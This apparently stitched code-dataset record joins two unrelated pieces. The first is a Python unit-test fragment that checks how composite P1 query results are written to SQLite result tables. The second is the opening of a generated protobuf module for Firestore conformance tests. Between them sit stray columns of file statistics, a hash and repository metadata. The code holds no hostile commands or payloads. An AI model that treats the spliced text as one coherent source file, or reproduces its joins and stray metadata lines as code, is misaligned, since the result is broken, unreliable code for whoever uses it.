qs.QRY_WHERECLAUSE : 'fname = nick AND lname = jones',
qs.QRY_NUMTERMSPERCLAUSE : 3,
qs.QRY_NUMCLAUSES : 2 }
sub_result1 = { qs.QRY_QID : 2,
rdb.DBF_MATCHINGRECORDIDS : set([1,3]) }
sub_result2 = { qs.QRY_QID : 3,
rdb.DBF_MATCHINGRECORDIDS : set([1,3,5]) }
self._result1 = \
{ qs.QRY_QID : 1,
rdb.DBF_MATCHINGRECORDIDS : set([1,3]),
qs.QRY_NUMRECORDSMATCHINGFIRSTTERM : 2,
qs.QRY_SUBRESULTS : [sub_result1, sub_result2]
}
self._query2 = { qs.QRY_CAT : 'P1',
qs.QRY_SUBCAT : 'eq_not',
qs.QRY_ENUM : qs.CAT.P1_EQ_NOT,
qs.QRY_DBNUMRECORDS : 30,
qs.QRY_DBRECORDSIZE : 1003,
qs.QRY_QID : 2,
qs.QRY_WHERECLAUSE : 'NOT(fname = nick) AND NOT(lname = jones)',
qs.QRY_PERF : ["LL"],
qs.QRY_NEGATEDTERMS : set([0,1]),
qs.QRY_NUMTERMSPERCLAUSE : 3,
qs.QRY_NUMCLAUSES : 2 }
self._result2 = \
{ qs.QRY_QID : 2,
rdb.DBF_MATCHINGRECORDIDS : set([1,3]),
qs.QRY_NUMRECORDSMATCHINGFIRSTTERM : 2,
rdb.DBF_P1NEGATEDTERM : set([0,1]),
qs.QRY_SUBRESULTS : [sub_result1, sub_result2]
}
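# query1/query2 above model composite P1 queries (eq_and / eq_not) whose
# results carry QRY_SUBRESULTS; the static-method tests below check how those
# sub-results are flattened into the full, full-to-atomic and full-to-full
# tables.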
def test_pre_write_to_full_table_q1(self):
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
entry = qr.QueryResultBase._pre_write_to_full_table(self._query1,
self._result1)
matching_record_ids = self._result1[rdb.DBF_MATCHINGRECORDIDS]
matching_records = len(matching_record_ids)
gold = \
{ rdb.DBF_FQID : self._query1[qs.QRY_QID],
rdb.DBF_CAT : self._query1[qs.QRY_CAT],
rdb.DBF_SUBCAT : self._query1[qs.QRY_SUBCAT],
rdb.DBF_NUMRECORDS : self._query1[qs.QRY_DBNUMRECORDS],
rdb.DBF_RECORDSIZE : self._query1[qs.QRY_DBRECORDSIZE],
rdb.DBF_WHERECLAUSE : self._query1[qs.QRY_WHERECLAUSE],
rdb.DBF_IBM1SUPPORTED : "IBM1" in self._query1[qs.QRY_PERF],
rdb.DBF_IBM2SUPPORTED : "IBM2" in self._query1[qs.QRY_PERF],
rdb.DBF_COLUMBIASUPPORTED : "COL" in self._query1[qs.QRY_PERF],
rdb.DBF_NUMMATCHINGRECORDS : matching_records,
rdb.DBF_MATCHINGRECORDIDS : matching_record_ids,
rdb.DBF_P1NUMTERMSPERCLAUSE :
self._query1[qs.QRY_NUMTERMSPERCLAUSE],
rdb.DBF_P1NUMCLAUSES : self._query1[qs.QRY_NUMCLAUSES],
rdb.DBF_P1ANDNUMRECORDSMATCHINGFIRSTTERM : \
self._result1[qs.QRY_NUMRECORDSMATCHINGFIRSTTERM] }
gold[rdb.DBF_SELECTSTAR] = entry[rdb.DBF_SELECTSTAR]
self.assertEqual(entry, gold)
def test_pre_write_to_full_table_q2(self):
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
entry = qr.QueryResultBase._pre_write_to_full_table(self._query2,
self._result2)
matching_record_ids = self._result2[rdb.DBF_MATCHINGRECORDIDS]
matching_records = len(matching_record_ids)
gold = \
{ rdb.DBF_FQID : self._query2[qs.QRY_QID],
rdb.DBF_CAT : self._query2[qs.QRY_CAT],
rdb.DBF_SUBCAT : self._query2[qs.QRY_SUBCAT],
rdb.DBF_NUMRECORDS : self._query2[qs.QRY_DBNUMRECORDS],
rdb.DBF_RECORDSIZE : self._query2[qs.QRY_DBRECORDSIZE],
rdb.DBF_WHERECLAUSE : self._query2[qs.QRY_WHERECLAUSE],
rdb.DBF_IBM1SUPPORTED : "IBM1" in self._query2[qs.QRY_PERF],
rdb.DBF_IBM2SUPPORTED : "IBM2" in self._query2[qs.QRY_PERF],
rdb.DBF_COLUMBIASUPPORTED : "COL" in self._query2[qs.QRY_PERF],
rdb.DBF_NUMMATCHINGRECORDS : matching_records,
rdb.DBF_MATCHINGRECORDIDS : matching_record_ids,
rdb.DBF_P1NEGATEDTERM : self._query2[qs.QRY_NEGATEDTERMS],
rdb.DBF_P1NUMTERMSPERCLAUSE :
self._query2[qs.QRY_NUMTERMSPERCLAUSE],
rdb.DBF_P1NUMCLAUSES : self._query2[qs.QRY_NUMCLAUSES] }
gold[rdb.DBF_SELECTSTAR] = entry[rdb.DBF_SELECTSTAR]
self.assertEqual(entry, gold)
def test_write_to_full_table_q1(self):
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
db_name = ':memory:'
db_object = ta1_database.Ta1ResultsDB(db_name)
qr.QueryResultBase.write_to_full_table(self._query1,
self._result1, db_object)
db_object._execute("SELECT * FROM " + rdb.DBF_TABLENAME)
rows = db_object._fetchall()
self.assertEqual(len(rows), 1)
fields = [ \
(rdb.DBF_FQID, 1),
(rdb.DBF_CAT, self._query1[qs.QRY_CAT]),
(rdb.DBF_SUBCAT, self._query1[qs.QRY_SUBCAT]),
(rdb.DBF_NUMRECORDS, self._query1[qs.QRY_DBNUMRECORDS]),
(rdb.DBF_RECORDSIZE, self._query1[qs.QRY_DBRECORDSIZE]),
(rdb.DBF_WHERECLAUSE, self._query1[qs.QRY_WHERECLAUSE]),
(rdb.DBF_NUMMATCHINGRECORDS, 2),
(rdb.DBF_MATCHINGRECORDIDS, "1|3" ),
(rdb.DBF_P1NUMTERMSPERCLAUSE,
self._query1[qs.QRY_NUMTERMSPERCLAUSE]),
(rdb.DBF_P1ANDNUMRECORDSMATCHINGFIRSTTERM,
self._result1[qs.QRY_NUMRECORDSMATCHINGFIRSTTERM]),
(rdb.DBF_P1NUMCLAUSES, self._query1[qs.QRY_NUMCLAUSES]),
(rdb.DBF_IBM1SUPPORTED, "IBM1" in self._query1[qs.QRY_PERF]),
(rdb.DBF_IBM2SUPPORTED, "IBM2" in self._query1[qs.QRY_PERF]),
(rdb.DBF_COLUMBIASUPPORTED, "COL" in self._query1[qs.QRY_PERF]) ]
for field, gold in fields:
cmd = "SELECT " + field + " FROM " + rdb.DBF_TABLENAME
db_object._execute(cmd)
row = db_object._fetchone()
# note: row is a tuple, we want the first element
self.assertEqual(row[0], gold)
db_object.close()
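# The field-by-field loop above also verifies how collection values are
# serialised into the results database: the matching id set([1, 3]) is
# expected back as the string "1|3", while the IBM/Columbia supported flags
# are checked against their membership tests on QRY_PERF.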
def test_write_to_full_table_q2(self):
qids.reset_atomic_qid_seen()
qids.reset_full_qid_seen()
db_name = ':memory:'
db_object = ta1_database.Ta1ResultsDB(db_name)
qr.QueryResultBase.write_to_full_table(self._query2,
self._result2, db_object)
db_object._execute("SELECT * FROM " + rdb.DBF_TABLENAME)
rows = db_object._fetchall()
self.assertEqual(len(rows), 1)
fields = [ \
(rdb.DBF_FQID, 2),
(rdb.DBF_CAT, self._query2[qs.QRY_CAT]),
(rdb.DBF_SUBCAT, self._query2[qs.QRY_SUBCAT]),
(rdb.DBF_NUMRECORDS, self._query2[qs.QRY_DBNUMRECORDS]),
(rdb.DBF_RECORDSIZE, self._query2[qs.QRY_DBRECORDSIZE]),
(rdb.DBF_WHERECLAUSE, self._query2[qs.QRY_WHERECLAUSE]),
(rdb.DBF_NUMMATCHINGRECORDS, 2),
(rdb.DBF_MATCHINGRECORDIDS, "1|3" ),
(rdb.DBF_P1NEGATEDTERM, "0|1"),
(rdb.DBF_P1NUMTERMSPERCLAUSE,
self._query2[qs.QRY_NUMTERMSPERCLAUSE]),
(rdb.DBF_P1NUMCLAUSES, self._query2[qs.QRY_NUMCLAUSES]),
(rdb.DBF_IBM1SUPPORTED, "IBM1" in self._query2[qs.QRY_PERF]),
(rdb.DBF_IBM2SUPPORTED, "IBM2" in self._query2[qs.QRY_PERF]),
(rdb.DBF_COLUMBIASUPPORTED, "COL" in self._query2[qs.QRY_PERF]) ]
for field, gold in fields:
cmd = "SELECT " + field + " FROM " + rdb.DBF_TABLENAME
db_object._execute(cmd)
row = db_object._fetchone()
# note: row is a tuple, we want the first element
self.assertEqual(row[0], gold)
db_object.close()
def test_pre_write_to_full_to_atomic_table(self):
qids.reset_full_to_atomic_qid_seen()
entries = \
qr.QueryResultBase._pre_write_to_full_to_atomic_table(self._query1,
self._result1)
gold = [ { rdb.F2A_FQID : 1, rdb.F2A_AQID : 2 },
{ rdb.F2A_FQID : 1, rdb.F2A_AQID : 3 } ]
self.assertEqual(entries, gold)
def test_write_to_full_to_atomic_table(self):
qids.reset_full_to_atomic_qid_seen()
db_name = ':memory:'
db_object = ta1_database.Ta1ResultsDB(db_name)
qr.QueryResultBase.write_to_full_to_atomic_table(self._query1,
self._result1,
db_object)
db_object._execute("SELECT * FROM " + rdb.F2A_TABLENAME)
rows = db_object._fetchall()
self.assertEqual(len(rows), 2)
self.assertEqual(rows[0], (1,2))
self.assertEqual(rows[1], (1,3))
db_object.close()
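# The (1, 2) and (1, 3) rows show the full-to-atomic table mapping the full
# query qid 1 to the qids of its two sub-results (2 and 3) from setUp.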
def test_pre_write_to_full_to_full_table(self):
# Note: calling full_to_full on a P1-and query is not meaningful in practice,
# but it exercises the code path for testing purposes.
qids.reset_full_to_full_qid_seen()
entries = \
qr.QueryResultBase._pre_write_to_full_to_full_table(self._query1,
self._result1)
gold = [ { rdb.F2F_BASEQID : 1, rdb.F2F_COMPOSITEQID : 2 },
{ rdb.F2F_BASEQID : 1, rdb.F2F_COMPOSITEQID : 3 } ]
self.assertEqual(entries, gold)
def test_write_to_full_to_full_table(self):
# Note: calling full_to_full on a P1-and query is not meaningful in practice,
# but it exercises the code path for testing purposes.
qids.reset_full_to_full_qid_seen()
db_name = ':memory:'
db_object = ta1_database.Ta1ResultsDB(db_name)
qr.QueryResultBase.write_to_full_to_full_table(self._query1,
self._result1, db_object)
db_object._execute("SELECT * FROM " + rdb.F2F_TABLENAME)
rows = db_object._fetchall()
self.assertEqual(len(rows), 2)
self.assertEqual(rows[0], (1,2))
self.assertEqual(rows[1], (1,3))
db_object.close()
| 44.821429
| 101
| 0.592377
| 4,290
| 37,650
| 4.798835
| 0.057809
| 0.049789
| 0.049157
| 0.037159
| 0.92607
| 0.919318
| 0.9029
| 0.871327
| 0.852431
| 0.850245
| 0
| 0.025149
| 0.310359
| 37,650
| 839
| 102
| 44.874851
| 0.767726
| 0.04332
| 0
| 0.716814
| 0
| 0
| 0.0188
| 0.002654
| 0
| 0
| 0
| 0
| 0.135693
| 1
| 0.047198
| false
| 0
| 0.011799
| 0
| 0.067847
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
126887881e53ed807aebac36f62240bab7f4f4f3
| 71,826
|
py
|
Python
|
firestore/google/cloud/firestore_v1/proto/tests_pb2.py
|
DaveCheez/google-cloud-python
|
fc03d4d41f13e9d13db7206438163b3a471fdabd
|
[
"Apache-2.0"
] | 2
|
2020-05-17T12:53:06.000Z
|
2021-04-12T02:13:43.000Z
|
firestore/google/cloud/firestore_v1/proto/tests_pb2.py
|
DaveCheez/google-cloud-python
|
fc03d4d41f13e9d13db7206438163b3a471fdabd
|
[
"Apache-2.0"
] | 40
|
2019-07-16T10:04:48.000Z
|
2020-01-20T09:04:59.000Z
|
firestore/google/cloud/firestore_v1/proto/tests_pb2.py
|
DaveCheez/google-cloud-python
|
fc03d4d41f13e9d13db7206438163b3a471fdabd
|
[
"Apache-2.0"
] | 2
|
2019-07-18T00:05:31.000Z
|
2019-11-27T14:17:22.000Z
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/firestore_v1/proto/tests.proto
import sys
_b = sys.version_info[0] < 3 and (lambda x: x) or (lambda x: x.encode("latin1"))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.cloud.firestore_v1.proto import (
common_pb2 as google_dot_cloud_dot_firestore__v1_dot_proto_dot_common__pb2,
)
from google.cloud.firestore_v1.proto import (
document_pb2 as google_dot_cloud_dot_firestore__v1_dot_proto_dot_document__pb2,
)
from google.cloud.firestore_v1.proto import (
firestore_pb2 as google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2,
)
from google.cloud.firestore_v1.proto import (
query_pb2 as google_dot_cloud_dot_firestore__v1_dot_proto_dot_query__pb2,
)
from google.protobuf import timestamp_pb2 as google_dot_protobuf_dot_timestamp__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name="google/cloud/firestore_v1/proto/tests.proto",
package="google.cloud.firestore_v1.proto",
syntax="proto3",
serialized_pb=_b(
'\n+google/cloud/firestore_v1/proto/tests.proto\x12\x1fgoogle.cloud.firestore_v1.proto\x1a,google/cloud/firestore_v1/proto/common.proto\x1a.google/cloud/firestore_v1/proto/document.proto\x1a/google/cloud/firestore_v1/proto/firestore.proto\x1a+google/cloud/firestore_v1/proto/query.proto\x1a\x1fgoogle/protobuf/timestamp.proto"@\n\x08TestFile\x12\x34\n\x05tests\x18\x01 \x03(\x0b\x32%.google.cloud.firestore_v1.proto.Test"\xa9\x04\n\x04Test\x12\x13\n\x0b\x64\x65scription\x18\x01 \x01(\t\x12\x0f\n\x07\x63omment\x18\n \x01(\t\x12\x37\n\x03get\x18\x02 \x01(\x0b\x32(.google.cloud.firestore_v1.proto.GetTestH\x00\x12=\n\x06\x63reate\x18\x03 \x01(\x0b\x32+.google.cloud.firestore_v1.proto.CreateTestH\x00\x12\x37\n\x03set\x18\x04 \x01(\x0b\x32(.google.cloud.firestore_v1.proto.SetTestH\x00\x12=\n\x06update\x18\x05 \x01(\x0b\x32+.google.cloud.firestore_v1.proto.UpdateTestH\x00\x12H\n\x0cupdate_paths\x18\x06 \x01(\x0b\x32\x30.google.cloud.firestore_v1.proto.UpdatePathsTestH\x00\x12=\n\x06\x64\x65lete\x18\x07 \x01(\x0b\x32+.google.cloud.firestore_v1.proto.DeleteTestH\x00\x12;\n\x05query\x18\x08 \x01(\x0b\x32*.google.cloud.firestore_v1.proto.QueryTestH\x00\x12=\n\x06listen\x18\t \x01(\x0b\x32+.google.cloud.firestore_v1.proto.ListenTestH\x00\x42\x06\n\x04test"Y\n\x07GetTest\x12\x14\n\x0c\x64oc_ref_path\x18\x01 \x01(\t\x12\x38\n\x07request\x18\x02 \x01(\x0b\x32\'.google.firestore.v1.GetDocumentRequest"|\n\nCreateTest\x12\x14\n\x0c\x64oc_ref_path\x18\x01 \x01(\t\x12\x11\n\tjson_data\x18\x02 \x01(\t\x12\x33\n\x07request\x18\x03 \x01(\x0b\x32".google.firestore.v1.CommitRequest\x12\x10\n\x08is_error\x18\x04 \x01(\x08"\xb5\x01\n\x07SetTest\x12\x14\n\x0c\x64oc_ref_path\x18\x01 \x01(\t\x12:\n\x06option\x18\x02 \x01(\x0b\x32*.google.cloud.firestore_v1.proto.SetOption\x12\x11\n\tjson_data\x18\x03 \x01(\t\x12\x33\n\x07request\x18\x04 \x01(\x0b\x32".google.firestore.v1.CommitRequest\x12\x10\n\x08is_error\x18\x05 \x01(\x08"\xb5\x01\n\nUpdateTest\x12\x14\n\x0c\x64oc_ref_path\x18\x01 \x01(\t\x12\x37\n\x0cprecondition\x18\x02 \x01(\x0b\x32!.google.firestore.v1.Precondition\x12\x11\n\tjson_data\x18\x03 \x01(\t\x12\x33\n\x07request\x18\x04 \x01(\x0b\x32".google.firestore.v1.CommitRequest\x12\x10\n\x08is_error\x18\x05 \x01(\x08"\xfd\x01\n\x0fUpdatePathsTest\x12\x14\n\x0c\x64oc_ref_path\x18\x01 \x01(\t\x12\x37\n\x0cprecondition\x18\x02 \x01(\x0b\x32!.google.firestore.v1.Precondition\x12?\n\x0b\x66ield_paths\x18\x03 \x03(\x0b\x32*.google.cloud.firestore_v1.proto.FieldPath\x12\x13\n\x0bjson_values\x18\x04 \x03(\t\x12\x33\n\x07request\x18\x05 \x01(\x0b\x32".google.firestore.v1.CommitRequest\x12\x10\n\x08is_error\x18\x06 \x01(\x08"\xa2\x01\n\nDeleteTest\x12\x14\n\x0c\x64oc_ref_path\x18\x01 \x01(\t\x12\x37\n\x0cprecondition\x18\x02 \x01(\x0b\x32!.google.firestore.v1.Precondition\x12\x33\n\x07request\x18\x03 \x01(\x0b\x32".google.firestore.v1.CommitRequest\x12\x10\n\x08is_error\x18\x04 \x01(\x08"T\n\tSetOption\x12\x0b\n\x03\x61ll\x18\x01 \x01(\x08\x12:\n\x06\x66ields\x18\x02 \x03(\x0b\x32*.google.cloud.firestore_v1.proto.FieldPath"\x9f\x01\n\tQueryTest\x12\x11\n\tcoll_path\x18\x01 \x01(\t\x12\x38\n\x07\x63lauses\x18\x02 \x03(\x0b\x32\'.google.cloud.firestore_v1.proto.Clause\x12\x33\n\x05query\x18\x03 \x01(\x0b\x32$.google.firestore.v1.StructuredQuery\x12\x10\n\x08is_error\x18\x04 \x01(\x08"\xde\x03\n\x06\x43lause\x12\x39\n\x06select\x18\x01 \x01(\x0b\x32\'.google.cloud.firestore_v1.proto.SelectH\x00\x12\x37\n\x05where\x18\x02 \x01(\x0b\x32&.google.cloud.firestore_v1.proto.WhereH\x00\x12<\n\x08order_by\x18\x03 
\x01(\x0b\x32(.google.cloud.firestore_v1.proto.OrderByH\x00\x12\x10\n\x06offset\x18\x04 \x01(\x05H\x00\x12\x0f\n\x05limit\x18\x05 \x01(\x05H\x00\x12;\n\x08start_at\x18\x06 \x01(\x0b\x32\'.google.cloud.firestore_v1.proto.CursorH\x00\x12>\n\x0bstart_after\x18\x07 \x01(\x0b\x32\'.google.cloud.firestore_v1.proto.CursorH\x00\x12\x39\n\x06\x65nd_at\x18\x08 \x01(\x0b\x32\'.google.cloud.firestore_v1.proto.CursorH\x00\x12=\n\nend_before\x18\t \x01(\x0b\x32\'.google.cloud.firestore_v1.proto.CursorH\x00\x42\x08\n\x06\x63lause"D\n\x06Select\x12:\n\x06\x66ields\x18\x01 \x03(\x0b\x32*.google.cloud.firestore_v1.proto.FieldPath"a\n\x05Where\x12\x38\n\x04path\x18\x01 \x01(\x0b\x32*.google.cloud.firestore_v1.proto.FieldPath\x12\n\n\x02op\x18\x02 \x01(\t\x12\x12\n\njson_value\x18\x03 \x01(\t"V\n\x07OrderBy\x12\x38\n\x04path\x18\x01 \x01(\x0b\x32*.google.cloud.firestore_v1.proto.FieldPath\x12\x11\n\tdirection\x18\x02 \x01(\t"a\n\x06\x43ursor\x12\x42\n\x0c\x64oc_snapshot\x18\x01 \x01(\x0b\x32,.google.cloud.firestore_v1.proto.DocSnapshot\x12\x13\n\x0bjson_values\x18\x02 \x03(\t".\n\x0b\x44ocSnapshot\x12\x0c\n\x04path\x18\x01 \x01(\t\x12\x11\n\tjson_data\x18\x02 \x01(\t"\x1a\n\tFieldPath\x12\r\n\x05\x66ield\x18\x01 \x03(\t"\x94\x01\n\nListenTest\x12\x36\n\tresponses\x18\x01 \x03(\x0b\x32#.google.firestore.v1.ListenResponse\x12<\n\tsnapshots\x18\x02 \x03(\x0b\x32).google.cloud.firestore_v1.proto.Snapshot\x12\x10\n\x08is_error\x18\x03 \x01(\x08"\xa3\x01\n\x08Snapshot\x12+\n\x04\x64ocs\x18\x01 \x03(\x0b\x32\x1d.google.firestore.v1.Document\x12;\n\x07\x63hanges\x18\x02 \x03(\x0b\x32*.google.cloud.firestore_v1.proto.DocChange\x12-\n\tread_time\x18\x03 \x01(\x0b\x32\x1a.google.protobuf.Timestamp"\xe0\x01\n\tDocChange\x12=\n\x04kind\x18\x01 \x01(\x0e\x32/.google.cloud.firestore_v1.proto.DocChange.Kind\x12*\n\x03\x64oc\x18\x02 \x01(\x0b\x32\x1d.google.firestore.v1.Document\x12\x11\n\told_index\x18\x03 \x01(\x05\x12\x11\n\tnew_index\x18\x04 \x01(\x05"B\n\x04Kind\x12\x14\n\x10KIND_UNSPECIFIED\x10\x00\x12\t\n\x05\x41\x44\x44\x45\x44\x10\x01\x12\x0b\n\x07REMOVED\x10\x02\x12\x0c\n\x08MODIFIED\x10\x03\x42\x8b\x01\n)com.google.cloud.conformance.firestore.v1B\x0eTestDefinition\xaa\x02"Google.Cloud.Firestore.Tests.Proto\xca\x02(Google\\Cloud\\Firestore\\Tests\\Conformanceb\x06proto3'
),
dependencies=[
google_dot_cloud_dot_firestore__v1_dot_proto_dot_common__pb2.DESCRIPTOR,
google_dot_cloud_dot_firestore__v1_dot_proto_dot_document__pb2.DESCRIPTOR,
google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2.DESCRIPTOR,
google_dot_cloud_dot_firestore__v1_dot_proto_dot_query__pb2.DESCRIPTOR,
google_dot_protobuf_dot_timestamp__pb2.DESCRIPTOR,
],
)
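# The serialized_pb blob above is the compiled FileDescriptorProto for
# tests.proto; the Descriptor objects that follow index into it via their
# serialized_start/serialized_end byte offsets.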
_DOCCHANGE_KIND = _descriptor.EnumDescriptor(
name="Kind",
full_name="google.cloud.firestore_v1.proto.DocChange.Kind",
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name="KIND_UNSPECIFIED", index=0, number=0, options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="ADDED", index=1, number=1, options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="REMOVED", index=2, number=2, options=None, type=None
),
_descriptor.EnumValueDescriptor(
name="MODIFIED", index=3, number=3, options=None, type=None
),
],
containing_type=None,
options=None,
serialized_start=3566,
serialized_end=3632,
)
_sym_db.RegisterEnumDescriptor(_DOCCHANGE_KIND)
_TESTFILE = _descriptor.Descriptor(
name="TestFile",
full_name="google.cloud.firestore_v1.proto.TestFile",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="tests",
full_name="google.cloud.firestore_v1.proto.TestFile.tests",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=301,
serialized_end=365,
)
_TEST = _descriptor.Descriptor(
name="Test",
full_name="google.cloud.firestore_v1.proto.Test",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="description",
full_name="google.cloud.firestore_v1.proto.Test.description",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="comment",
full_name="google.cloud.firestore_v1.proto.Test.comment",
index=1,
number=10,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="get",
full_name="google.cloud.firestore_v1.proto.Test.get",
index=2,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="create",
full_name="google.cloud.firestore_v1.proto.Test.create",
index=3,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="set",
full_name="google.cloud.firestore_v1.proto.Test.set",
index=4,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="update",
full_name="google.cloud.firestore_v1.proto.Test.update",
index=5,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="update_paths",
full_name="google.cloud.firestore_v1.proto.Test.update_paths",
index=6,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="delete",
full_name="google.cloud.firestore_v1.proto.Test.delete",
index=7,
number=7,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="query",
full_name="google.cloud.firestore_v1.proto.Test.query",
index=8,
number=8,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="listen",
full_name="google.cloud.firestore_v1.proto.Test.listen",
index=9,
number=9,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="test",
full_name="google.cloud.firestore_v1.proto.Test.test",
index=0,
containing_type=None,
fields=[],
)
],
serialized_start=368,
serialized_end=921,
)
_GETTEST = _descriptor.Descriptor(
name="GetTest",
full_name="google.cloud.firestore_v1.proto.GetTest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="doc_ref_path",
full_name="google.cloud.firestore_v1.proto.GetTest.doc_ref_path",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="request",
full_name="google.cloud.firestore_v1.proto.GetTest.request",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=923,
serialized_end=1012,
)
_CREATETEST = _descriptor.Descriptor(
name="CreateTest",
full_name="google.cloud.firestore_v1.proto.CreateTest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="doc_ref_path",
full_name="google.cloud.firestore_v1.proto.CreateTest.doc_ref_path",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="json_data",
full_name="google.cloud.firestore_v1.proto.CreateTest.json_data",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="request",
full_name="google.cloud.firestore_v1.proto.CreateTest.request",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="is_error",
full_name="google.cloud.firestore_v1.proto.CreateTest.is_error",
index=3,
number=4,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1014,
serialized_end=1138,
)
_SETTEST = _descriptor.Descriptor(
name="SetTest",
full_name="google.cloud.firestore_v1.proto.SetTest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="doc_ref_path",
full_name="google.cloud.firestore_v1.proto.SetTest.doc_ref_path",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="option",
full_name="google.cloud.firestore_v1.proto.SetTest.option",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
